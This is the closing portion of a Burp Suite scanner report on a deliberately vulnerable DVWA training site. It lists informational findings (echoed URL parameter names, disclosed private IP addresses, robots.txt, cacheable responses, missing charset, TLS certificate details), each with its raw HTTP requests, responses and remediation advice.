|
Severity: |
Information |
Confidence: |
Firm |
Host: |
https://pentest-ground.com:4280 |
Path: |
/security.php |
Issue detail
The name of an arbitrarily supplied URL parameter is copied into the response within the path of a URL.
The payload wym1r55mdy was submitted in the name of an arbitrarily supplied URL parameter. This input was echoed unmodified within the response header Location.
This proof-of-concept attack demonstrates that it is possible to modify the URL to reference an arbitrary path. It is also possible to control the query string of the URL to perform HTTP client-side parameter pollution attacks.
Request 1
POST /security.php/wym1r55mdy HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=4cdb65dc6a90378aa05827fde1250207
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/security.php
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 80
security=medium&seclev_submit=Submit&user_token=d95fa062a384851dde513e456b1e1d73
Response 1
HTTP/1.1 302 Found
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:52:08 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: security=medium; path=/
Location: /security.php/wym1r55mdy
36.2. https://pentest-ground.com:4280/setup.php [name of an arbitrarily supplied URL parameter]
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Firm |
Host: |
https://pentest-ground.com:4280 |
Path: |
/setup.php |
Issue detail
The name of an arbitrarily supplied URL parameter is copied into the response within the path of a URL.
The payload iad5qlirov was submitted in the name of an arbitrarily supplied URL parameter. This input was echoed unmodified within the response header Location.
This proof-of-concept attack demonstrates that it is possible to modify the URL to reference an arbitrary path.
Request 1
POST /setup.php/iad5qlirov HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=e692295246a3c485fe56c87553890417
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/setup.php
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 79
create_db=Create+%2F+Reset+Database&user_token=5a4acf691a8131eb5a9395656e876e35
Response 1
HTTP/1.1 302 Found
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:46:18 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: /setup.php/iad5qlirov
37. Private IP addresses disclosed
Previous
Next
There are 2 instances of this issue:
Issue background
RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organization, the private addresses used internally cannot usually be determined in the same ways.
Discovering the private addresses used within an organization can help an attacker in carrying out network-layer attacks aiming to penetrate the organization's internal infrastructure.
Issue remediation
There is not usually any good reason to disclose the internal IP addresses used within an organization's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.
References
Vulnerability classifications
37.1. https://pentest-ground.com:4280/phpinfo.php
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/phpinfo.php |
Issue detail
The following RFC 1918 IP addresses were disclosed in the response:- 172.18.0.3
- 172.20.0.2
- 172.20.0.6
Request 1
GET /phpinfo.php HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=e00e28236ae59386587b3d8a65c24511
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:38:25 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 82847
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<style type="text/css">
body {background-color: #fff; co
...[SNIP]...
<td class="v">172.18.0.3:80 </td>
...[SNIP]...
<td class="v">172.20.0.2 </td>
...[SNIP]...
<td class="v">172.20.0.2</td>
...[SNIP]...
37.2. https://pentest-ground.com:4280/vulnerabilities/fi/
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/fi/ |
Issue detail
The following RFC 1918 IP address was disclosed in the response:
Request 1
GET /vulnerabilities/fi/?page=file1.php HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=143c86fc083ce7d7f684f49dfdbc3c28
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/fi/?page=include.php
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:36:08 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4094
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: File Inclusion :: Damn Vulnerable Web Application (DVWA)<
...[SNIP]...
<em>172.20.0.2</em>
...[SNIP]...
38. Robots.txt file
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/robots.txt |
Issue detail
The web server contains a robots.txt file.
Issue background
The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site that robots are allowed, or not allowed, to crawl and index.
The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.
Issue remediation
The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honor the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorized access.
Vulnerability classifications
Request 1
GET /robots.txt HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:38:39 GMT
Content-Type: text/plain
Content-Length: 25
Connection: close
Last-Modified: Tue, 21 Nov 2023 11:18:49 GMT
ETag: "19-60aa7c44ae30b"
Accept-Ranges: bytes
User-agent: *
Disallow: /
39. Cacheable HTTPS response
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/ |
Issue detail
This issue was found in multiple locations under the reported path.
Issue background
Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.
Issue remediation
Applications should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:
- Cache-control: no-store
- Pragma: no-cache
References
Vulnerability classifications
Request 1
GET /docs/DVWA_v1.3.pdf HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=33b54a2ee3adcc13612ba6943ddba842
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/instructions.php?doc=PDF
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:37:43 GMT
Content-Type: application/pdf
Content-Length: 422011
Connection: close
Last-Modified: Tue, 21 Nov 2023 11:18:49 GMT
ETag: "6707b-60aa7c44ae30b"
Accept-Ranges: bytes
%PDF-1.3
%...........
4 0 obj
<< /Length 5 0 R /Filter /FlateDecode >>
stream
x..V.n.0...+.(.,......-.^.6FrhzHT.qa....;......f....H.N....qFO...H..4..B.fN..@..VQ.%E...|q.1..o.....v%6K.T9;.Tk..Me]S...S.
...[SNIP]...
Request 2
GET /README.pt.md HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=d3e2bad7ac45eec22b45a259f5624a6f
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/instructions.php
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 2
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:53 GMT
Content-Type: text/markdown
Content-Length: 21239
Connection: close
Last-Modified: Tue, 21 Nov 2023 11:18:49 GMT
ETag: "52f7-60aa7c44ac3ca"
Accept-Ranges: bytes
Content-Language: pt
# DAMN VULNERABLE WEB APPLICATION
Damn Vulnerable Web Application (DVWA) .. um aplicativo web em PHP/MySQL que .. extremamente vulner..vel. Seu principal objetivo .. auxiliar profissionais de seguran
...[SNIP]...
Request 3
GET /README.fa.md HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=f645cd9901dfcd217cc382a83297b7b7
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/instructions.php
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 3
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:51 GMT
Content-Type: text/markdown
Content-Length: 30612
Connection: close
Last-Modified: Tue, 21 Nov 2023 11:18:49 GMT
ETag: "7794-60aa7c44ac3ca"
Accept-Ranges: bytes
Content-Language: fa
# ................ ...... .............. ...................
................ ...... .............. ................... (DVWA).. .... ................ ...... .......... .... ................../.......
...[SNIP]...
40. HTML does not specify charset
Previous
Next
There are 2 instances of this issue:
Issue description
If a response states that it contains HTML content but does not specify a character set, then the browser may analyze the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.
In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of affected responses, and the context in which they appear, to determine whether any vulnerability exists.
Issue remediation
For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognized character set, for example charset=ISO-8859-1.
Vulnerability classifications
40.1. http://pentest-ground.com:4280/
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://pentest-ground.com:4280 |
Path: |
/ |
Request 1
GET / HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 400 Bad Request
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:14 GMT
Content-Type: text/html
Content-Length: 657
Connection: close
<html>
<head><title>400 The plain HTTP request was sent to HTTPS port</title></head>
<body>
<center><h1>400 Bad Request</h1></center>
<center>The plain HTTP request was sent to HTTPS port</center>
...[SNIP]...
40.2. http://pentest-ground.com:4280/robots.txt
Previous
Summary
|
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://pentest-ground.com:4280 |
Path: |
/robots.txt |
Request 1
GET /robots.txt HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Response 1
HTTP/1.1 400 Bad Request
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:16 GMT
Content-Type: text/html
Content-Length: 657
Connection: close
<html>
<head><title>400 The plain HTTP request was sent to HTTPS port</title></head>
<body>
<center><h1>400 Bad Request</h1></center>
<center>The plain HTTP request was sent to HTTPS port</center>
...[SNIP]...
41. TLS certificate
Previous
Summary
|
Severity: |
Information |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/ |
Issue detail
The server presented a valid, trusted TLS certificate. This issue is purely informational.
The server presented the following certificates:
Server certificate
Issued to: | pentest-ground.com |
Issued by: | E6 |
Valid from: | Mon Sep 30 13:36:39 UTC 2024 |
Valid to: | Sun Dec 29 13:36:38 UTC 2024 |
Certificate chain #1
Issued to: | E6 |
Issued by: | ISRG Root X1 |
Valid from: | Wed Mar 13 00:00:00 UTC 2024 |
Valid to: | Fri Mar 12 23:59:59 UTC 2027 |
Certificate chain #2
Issued to: | ISRG Root X1 |
Issued by: | ISRG Root X1 |
Valid from: | Thu Jun 04 11:04:38 UTC 2015 |
Valid to: | Mon Jun 04 11:04:38 UTC 2035 |
Issue background
TLS (or SSL) helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an TLS certificate that is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, TLS connections to the server will not provide the full protection for which TLS is designed.
It should be noted that various attacks exist against TLS in general, and in the context of HTTPS web connections in particular. It may be possible for a determined and suitably-positioned attacker to compromise TLS connections without user detection even when a valid TLS certificate is used.
References
Vulnerability classifications
Report generated by Burp Suite web vulnerability scanner v2024.9.2, at Mon Oct 21 10:32:07 UTC 2024.